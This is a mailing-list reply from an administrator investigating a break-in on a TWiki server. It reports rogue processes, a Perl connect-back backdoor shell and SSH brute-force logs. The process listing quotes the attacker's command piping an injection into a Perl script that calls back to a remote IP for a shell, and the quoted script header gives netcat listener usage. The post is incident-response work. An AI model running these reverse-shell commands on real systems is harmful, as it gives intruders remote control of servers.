Re: Wiki hacked?
+++ Wookey [05-09-29 17:57 +0100]:
> +++ Wolfgang Denk [05-09-29 17:11 +0200]:
> And the reason there is no debian update for it is that the debian twiki
> package is not installed. Looks like whoever installed twiki put their own
> tarball in instead of the debian package.
>
> That was a mistake - leaves you exposed to security flaws down the line...
OK - it looks like there isn't a twiki package in testing (which the server
is running), which is no doubt why we have a manual install.
> I'll change over to the debian one ASAP. If anyone knows how to do that
> without losing the current content then do feel free to stick your oar in.
I've put in the twiki package from unstable but kept the machine pinned at
testing.
Found a bit more evidence of wrongdoing:
we have these rogue www-data processes:
22605 ./bind 1234
22905 sh -c /usr/bin/rlog -rr1.37|perl /var/tmp/backup.pl 222.124.24.19 995
'/var/www/twiki/data/Main/TWikiUsers.t
22907 lpd
22908 sh -c echo "uname -a";echo "id";/bin/sh
22913 /bin/sh
22924 ./stack
22925 ./stack
22926 ./stack
the last stack is using 99% CPU and has used 4365:59 system time
and /var/tmp/backup.pl is an exploit:
#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for
example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl
connect.pl <iptoolbox> <ncportlisten>
# --------
# The supplied exploit code is not to be used for malicious purpose, but for
educational purpose only. The Authors and
#1ndonesian Security Team WILL NOT responsible for anything happened by the
couse of using all information on these website.
# ---------
It's pointing at what looks like malaysian server 222.124.24.19 port 995,
which is pop3s.
I've killed those processes and moved the files.
There are loads of messages like:
Sep 25 14:06:14 onz sshd[15369]: Illegal user chloe from 67.43.156.87
from sep 19th to today- looks like brute-force attempt to login?
comes from servers:
61.222.201.234 21:46 to 22:01 on sep 19th
222.96.156.87 12:31 to 13:06 on sep 20th
218.93.19.46 13:Â34 to 13:43 on sep 20th
211.22.100.150 23:14 to 23:16 on sep 21st
67.121.61.114 11:40 to 12:26 on sep 22nd
195.251.209.2 at 18:06 on sep 22nd
202.91.170.2 20:30 to 20:49 on sep 22nd including a lot of messahes like
Sep 22 20:47:12 onz sshd[8760]: reverse mapping checking getaddrinfo for
luis.spu.edu.ph failed - POSSIBLE BREAKIN ATTEMPT!
82.232.9.181 14:42 to 15:04 on sep 23rd
203.253.176.203 at 17:10 on sep 23rd
and so on.
The original www-data failed login came from 85.186.165.112:
Sep 19 20:12:46 onz sshd[27962]: (pam_unix) authentication failure;
logname= uid=0 euid=0 tty=ssh ruser= rhost=85.186.165.112 us
er=www-data
Sep 19 20:12:48 onz sshd[27959]: error: PAM: Authentication failure for
www-data from 85.186.165.112
Sep 19 20:12:59 onz sshd[27959]: error: PAM: Authentication failure for
www-data from 85.186.165.112
Sep 19 20:13:04 onz sshd[27959]: error: PAM: Have exhasted maximum number of
retries for service. for www-data from 85.186.165.112
OK - that's enough for tonight
Wookey
--
Aleph One Ltd, Bottisham, CAMBRIDGE, CB5 9BA, UK Tel +44 (0) 1223 811679
work: http://www.aleph1.co.uk/ play: http://www.chaos.org.uk/~wookey/
Reply to: